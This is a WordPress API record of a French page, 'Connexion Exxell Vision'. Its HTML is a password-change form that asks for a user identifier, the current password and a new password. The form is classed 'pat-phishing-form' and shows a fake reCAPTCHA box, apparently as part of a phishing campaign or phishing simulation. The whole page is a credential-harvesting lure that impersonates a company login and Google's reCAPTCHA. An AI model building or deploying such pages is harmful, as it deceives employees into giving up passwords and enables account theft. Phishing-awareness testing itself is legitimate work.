{"id":10,"date":"2026-02-20T10:29:02","date_gmt":"2026-02-20T10:29:02","guid":{"rendered":"https:\/\/ipvideo.fr\/?page_id=10"},"modified":"2026-02-20T10:29:02","modified_gmt":"2026-02-20T10:29:02","slug":"connexion-exxell-vision","status":"publish","type":"page","link":"https:\/\/ipvideo.fr\/","title":{"rendered":"Connexion Exxell Vision"},"content":{"rendered":"        <div class=\"pat-page-wrapper pat-exxell-bg\">\r\n            <div class=\"pat-exxell-layout\">\r\n\r\n                <!-- Colonne gauche : Logo -->\r\n                <div class=\"pat-exxell-left\">\r\n                    <div class=\"pat-exxell-logo-block\">\r\n                                                    <img decoding=\"async\" src=\"http:\/\/ipvideo.fr\/wp-content\/uploads\/2026\/02\/Exxell-Vision-logo.jpg\" alt=\"Logo\" class=\"pat-exxell-logo-img\" \/>\r\n                                            <\/div>\r\n                <\/div>\r\n\r\n                <!-- Colonne droite : Formulaire -->\r\n                <div class=\"pat-exxell-right\">\r\n                    <div class=\"pat-exxell-form-card\">\r\n                        <div class=\"pat-exxell-form-header\">\r\n                            <h2 class=\"pat-exxell-form-title\">Changement de mot de passe<\/h2>\r\n                            <p class=\"pat-exxell-form-subtitle\">Pour des raisons de s\u00e9curit\u00e9, veuillez mettre \u00e0 jour votre mot de passe.<\/p>\r\n                        <\/div>\r\n\r\n                        <form class=\"pat-phishing-form\" data-form-type=\"exxell\" data-campaign=\"0\">\r\n                                                        \r\n                            <div class=\"pat-form-group\">\r\n                                <label for=\"pat-ex-email\">Identifiant<\/label>\r\n                                <input type=\"text\" id=\"pat-ex-email\" name=\"email\" class=\"pat-input pat-exxell-input\"\r\n                                       placeholder=\"Collaborateur\" required autocomplete=\"off\" \/>\r\n                            <\/div>\r\n\r\n                            <div class=\"pat-form-group\">\r\n                                <label for=\"pat-ex-current-pwd\">Mot de passe actuel<\/label>\r\n                                <input type=\"password\" id=\"pat-ex-current-pwd\" name=\"current_password\" class=\"pat-input pat-exxell-input\"\r\n                                       placeholder=\"\" required autocomplete=\"off\" \/>\r\n                            <\/div>\r\n\r\n                            <div class=\"pat-form-group\">\r\n                                <label for=\"pat-ex-new-pwd\">Nouveau mot de passe<\/label>\r\n                                <input type=\"password\" id=\"pat-ex-new-pwd\" name=\"new_password\" class=\"pat-input pat-exxell-input\"\r\n                                       placeholder=\"\" required autocomplete=\"off\" \/>\r\n                            <\/div>\r\n\r\n                            <div class=\"pat-form-group\">\r\n                                <label for=\"pat-ex-confirm-pwd\">Confirmer le nouveau mot de passe<\/label>\r\n                                <input type=\"password\" id=\"pat-ex-confirm-pwd\" name=\"confirm_password\" class=\"pat-input pat-exxell-input\"\r\n                                       placeholder=\"\" required autocomplete=\"off\" \/>\r\n                            <\/div>\r\n\r\n                            <div class=\"pat-form-group pat-checkbox-group\">\r\n                                <label>\r\n                                    <input type=\"checkbox\" name=\"remember_me\" \/>\r\n                                    Se souvenir de moi\r\n                                <\/label>\r\n                            <\/div>\r\n\r\n                            <!-- Faux reCAPTCHA -->\r\n                            <div class=\"pat-recaptcha-wrapper\">\r\n                                <div class=\"pat-recaptcha-box\" id=\"pat-recaptcha\">\r\n                                    <div class=\"pat-recaptcha-left\">\r\n                                        <div class=\"pat-recaptcha-checkbox\" id=\"pat-recaptcha-cb\">\r\n                                            <svg class=\"pat-recaptcha-check\" viewBox=\"0 0 24 24\" style=\"display:none;\">\r\n                                                <polyline points=\"4,12 10,18 20,6\" fill=\"none\" stroke=\"#4285f4\" stroke-width=\"3\" stroke-linecap=\"round\" stroke-linejoin=\"round\"\/>\r\n                                            <\/svg>\r\n                                        <\/div>\r\n                                        <span class=\"pat-recaptcha-label\">Je ne suis pas un robot<\/span>\r\n                                    <\/div>\r\n                                    <div class=\"pat-recaptcha-right\">\r\n                                        <div class=\"pat-recaptcha-logo\">\r\n                                            <svg viewBox=\"0 0 40 40\" width=\"32\" height=\"32\">\r\n                                                <path d=\"M30.8,6.8c-2.9-2.9-6.8-4.5-10.8-4.5c-4.1,0-7.9,1.6-10.8,4.5C6.3,9.7,4.7,13.5,4.7,17.6h5.5 c0-2.6,1-5.1,2.9-6.9c1.8-1.8,4.3-2.9,6.9-2.9c2.6,0,5.1,1,6.9,2.9c1.8,1.8,2.9,4.3,2.9,6.9H35 C35.3,13.5,33.7,9.7,30.8,6.8z\" fill=\"#1c3aa9\"\/>\r\n                                                <path d=\"M20,35.3c4.1,0,7.9-1.6,10.8-4.5c2.9-2.9,4.5-6.8,4.5-10.8h-5.5c0,2.6-1,5.1-2.9,6.9 c-1.8,1.8-4.3,2.9-6.9,2.9v5.5z\" fill=\"#4285f4\"\/>\r\n                                                <path d=\"M9.2,30.8C12.1,33.7,15.9,35.3,20,35.3v-5.5c-2.6,0-5.1-1-6.9-2.9c-1.8-1.8-2.9-4.3-2.9-6.9 H4.7C4.7,24,6.3,27.9,9.2,30.8z\" fill=\"#ababab\"\/>\r\n                                            <\/svg>\r\n                                        <\/div>\r\n                                        <div class=\"pat-recaptcha-branding\">\r\n                                            <span class=\"pat-recaptcha-brand-text\">reCAPTCHA<\/span>\r\n                                            <span class=\"pat-recaptcha-brand-links\">Confidentialit\u00e9 \u00b7 Conditions<\/span>\r\n                                        <\/div>\r\n                                    <\/div>\r\n                                <\/div>\r\n                                <!-- Spinner pour l'animation de v\u00e9rification -->\r\n                                <div class=\"pat-recaptcha-spinner-overlay\" id=\"pat-recaptcha-spinner\" style=\"display:none;\">\r\n                                    <div class=\"pat-recaptcha-spin\"><\/div>\r\n                                    <span>V\u00e9rification...<\/span>\r\n                                <\/div>\r\n                            <\/div>\r\n\r\n                            <button type=\"submit\" class=\"pat-submit-btn pat-exxell-submit\" id=\"pat-exxell-submit-btn\" disabled>\r\n                                <span class=\"pat-btn-text\">Confirmer le changement<\/span>\r\n                                <span class=\"pat-btn-loader\" style=\"display:none;\">\r\n                                    <span class=\"pat-spinner\"><\/span> Traitement en cours...\r\n                                <\/span>\r\n                            <\/button>\r\n                        <\/form>\r\n                    <\/div>\r\n                <\/div>\r\n\r\n            <\/div>\r\n        <\/div>\r\n        \n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-10","page","type-page","status-publish","hentry"],"blocksy_meta":[],"_links":{"self":[{"href":"https:\/\/ipvideo.fr\/index.php?rest_route=\/wp\/v2\/pages\/10","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ipvideo.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ipvideo.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ipvideo.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ipvideo.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10"}],"version-history":[{"count":1,"href":"https:\/\/ipvideo.fr\/index.php?rest_route=\/wp\/v2\/pages\/10\/revisions"}],"predecessor-version":[{"id":11,"href":"https:\/\/ipvideo.fr\/index.php?rest_route=\/wp\/v2\/pages\/10\/revisions\/11"}],"wp:attachment":[{"href":"https:\/\/ipvideo.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}